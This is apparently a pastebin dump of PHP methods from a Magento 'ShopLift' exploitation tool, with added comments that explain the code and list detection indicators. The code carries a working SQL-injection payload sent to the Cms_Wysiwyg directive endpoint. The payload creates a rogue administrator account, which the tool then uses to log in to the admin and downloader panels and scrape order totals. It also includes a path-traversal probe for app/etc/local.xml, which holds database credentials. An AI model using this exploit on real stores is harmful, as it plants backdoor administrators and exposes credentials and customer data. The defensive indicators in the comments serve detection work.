ha

a guest
Apr 27th, 2017
  /**
   * Posts the stored credentials to the Magento Connect Manager at
   * <scheme>://<host>/downloader/ and reports whether the reply looks
   * like an authenticated page (the code keys on "Log Out" or
   * "Return to Admin" appearing in the response body).
   *
   * The output is limited to the "Permission" line: the first `return`
   * inside the if-branch is taken unconditionally, so the $smtp and
   * $filesystem lines that follow it never execute.
   *
   * Detection note: the request this produces is a plain POST of the
   * `username` / `password` form fields to /downloader/, immediately
   * after the same client has hit the admin paths used elsewhere here.
   *
   * @param string $url  target URL; only its scheme and host are reused
   * @return string      "Success\nPermission\t\t: ..." or "Failed"
   */
  1. private function LoginDownloader($url){
  2. $link = parse_url($url);
  // CurlPost() is defined elsewhere in the class; presumably a POST
  // returning the response body as a string — confirm against its source.
  3. $data = $this->CurlPost(sprintf("%s://%s/downloader/",$link["scheme"],$link["host"]),
  4. array("username" => $this->username,
  5. "password" => $this->password)
  6. );
  // Either marker string in the body is treated as "logged in".
  7. if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
  // "Writeable" unless the Connect Manager's write-permission warning is present.
  8. $permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
  9. return "Success\nPermission\t\t: ".$permission;
  // Unreachable from here to the else: the return above always fires.
  10. $smtp = (!eregi("Smtp",$data) || !eregi("Mandrill",$data) || !eregi("smtp",$data) ? "Smtp Look" : "Ga Ada Smtp");
  11. return "Success\nSmtpPro\t\t: ".$smtp;
  12. $filesystem = (!eregi("File_System",$data) ? "File System Ada" : "No");
  13. return "Success\nFile system\t\t: ".$filesystem;
  14. } else {
  15. return "Failed";
  16. }
  17. }
  18.  
  /**
   * Logs into the Magento admin panel with the stored credentials: fetches
   * /admin/ once to scrape the hidden `form_key`, then POSTs
   * login[username] / login[password] / form_key to the same URL.
   *
   * Returns a "Success" line in every case — nothing here inspects the
   * login response for an actual logged-in marker. The "Order Total" value
   * is whatever GetStr() extracts between the first <span class="price">
   * and </span> in the response; when LocalFileDiscloure() yields a value
   * it is appended under "Instaled" (sic).
   *
   * Detection note: LocalFileDiscloure() is invoked twice (once in the
   * condition, once in the return), so the local.xml probe is sent twice
   * per target back-to-back — a recognisable pattern in access logs.
   *
   * @param string $target  target URL; only its scheme and host are reused
   * @return string
   */
  19. private function LoginAdmin($target){
  20. $link = parse_url($target);
  // First GET/POST to /admin/ just to harvest the CSRF form_key.
  21. $get = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]));
  // GetStr() is defined elsewhere in the class; presumably returns the
  // substring between the two markers — confirm against its source.
  22. $key = $this->GetStr("<input name=\"form_key\" type=\"hidden\" value=\"","\" />",$get);
  23. $data = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]),
  24. array("login[username]" => $this->username,
  25. "login[password]" => $this->password,
  26. "form_key" => $key)
  27. );
  // Second local.xml probe happens inside the return expression below.
  28. if($this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]))){
  29. return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data)."\nInstaled\t\t:".$this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]));
  30. } else {
  31. return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data);
  32. }
  33. }
  34.  
  /**
   * Sends the Magento "Shoplift" SQL-injection payload through the
   * Cms_Wysiwyg directive endpoint. The `filter` parameter is a
   * base64-encoded grid filter whose tail is raw SQL: it inserts an
   * admin_user row for $this->username / $this->password (MD5 with the
   * fixed salt 'rp', in Magento's legacy hash:salt form) plus a matching
   * admin_role row. Success is judged solely by whether the response body
   * decodes as an image, i.e. whether the directive block was rendered.
   *
   * This abuses a long-patched Magento vulnerability; a site that still
   * answers it is running an unpatched install. Defensive indicators that
   * can be read straight off this code:
   *   - POST to /admin/Cms_Wysiwyg/directive/index/ carrying `filter`,
   *     `___directive` and `forwarded=1`;
   *   - a new admin_user with firstname 'Firstname', lastname 'Lastname'
   *     and an e-mail ending in '@telekpitekwashere.cok';
   *   - an admin_role row named 'Firstname' with role_type 'U'.
   * Any of these in the database or access logs warrants incident handling.
   *
   * @param string $target  scheme://host, no trailing slash
   * @return bool           true when the response parsed as image data
   */
  35. private function ShopLiftExploit($target){
  // 15 hex chars derived from the current time — the local part of the
  // injected account's e-mail address.
  36. $email = substr(md5(time()),2,15);
  37. $link = parse_url($target);
  38. $data = $this->CurlPost(sprintf("%s://%s/admin/Cms_Wysiwyg/directive/index/",$link["scheme"],$link["host"]),
  39. array("filter" => base64_encode("popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = 'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{$this->password}') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','{$email}@telekpitekwashere.cok','{$this->username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{$this->username}'),'Firstname');"),
  40. "___directive" => base64_encode("{{block type=Adminhtml/report_search_grid output=getCsvFile}}"),
  41. "forwarded" => "1")
  42. );
  // Rendered directive output is image data; anything else decodes to
  // false. The `@` hides the warning imagecreatefromstring() emits on
  // non-image input.
  43. return (@imagecreatefromstring($data) !== false);
  44. }
  45.  
  /**
   * Per-victim driver: normalises the input to scheme://host, runs
   * ShopLiftExploit(), and on success also runs the downloader and admin
   * logins, appending a formatted result block to
   * "ShopLift-<d-m-Y>.log" in the current working directory.
   *
   * Both branches `return` before the trailing fclose(), so the handle is
   * never closed explicitly (PHP releases it at script end). The log file
   * name and the "============[ShopLift Result]============" banner are
   * useful host-side artefacts when this tool is found on a machine.
   *
   * @param string $victim  bare host or full URL
   * @return string         result block, or a timestamped "Not vuln" line
   */
  46. private function ExecuteExploit($victim){
  // Opened before the vulnerability check, so the log file is created
  // (empty) even for targets that are not vulnerable.
  47. $file = fopen("ShopLift-".date("d-m-Y").".log","a");
  48. $url = parse_url($victim);
  // No scheme → assume http:// and use the raw input; otherwise keep only
  // scheme and host (any path component is dropped).
  49. $target = (!isset($url["scheme"]) ? "http://".$victim : $url["scheme"]."://".$url["host"]);
  50. if($this->ShopLiftExploit($target)){
  51. $downloader = $this->LoginDownloader($target);
  52. $admin = $this->LoginAdmin($target);
  53. $result = "\n============[ShopLift Result]============\nSite\t\t\t: {$target}\nLogin Admin\t\t: {$admin}\nLogin Downloader\t: {$downloader}\n===========================================\n";
  54. fwrite($file,$result);
  55. return $result;
  56. }else {
  57. return "[".date("H:i:s")."] ".$target." => Not vuln !\n";
  58. }
  59.  
  // Unreachable: every path above has already returned.
  60. fclose($file);
  61. }
  62.  
  63.  
  /**
   * Probes the target for a web-readable app/etc/local.xml (Magento's
   * configuration file holding the database credentials) and returns the
   * value inside its <date><![CDATA[...]]></date> element.
   *
   * Two candidate paths are listed, but the loop returns during its first
   * iteration in both branches, so only "/app/etc/local.xml" is ever
   * requested; the Magmi download_file.php path is never sent.
   *
   * Defensive note: if /app/etc/local.xml is served by the web server, the
   * install's database credentials are exposed regardless of any other
   * patch level. Magento's stock .htaccess denies access to app/; the
   * equivalent rule must exist in any nginx or custom Apache config, and
   * both paths listed here are worth alerting on in access logs.
   *
   * @param string $target  scheme://host
   * @return mixed          GetStr() result (presumably a string) or false
   */
  64. private function LocalFileDiscloure($target){
  65. $path = array( "/app/etc/local.xml",
  66. "/magmi/web/download_file.php?file=../../app/etc/local.xml"
  67. );
  68. for($i=0;$i<=count($path);$i++){
  69. $test = $this->CurlPost($target.$path[$i]);
  // Heuristic: a readable local.xml contains both "install" and "date".
  70. if(isset($test) && preg_match('/install/i',$test) && preg_match('/date/i',$test)){
  71. return $this->GetStr("<date><![CDATA[","]]></date>",$test);
  72. } else {
  // Returns on the first miss, so the second path is never tried.
  73. return false;
  74. }
  75. }
  76. }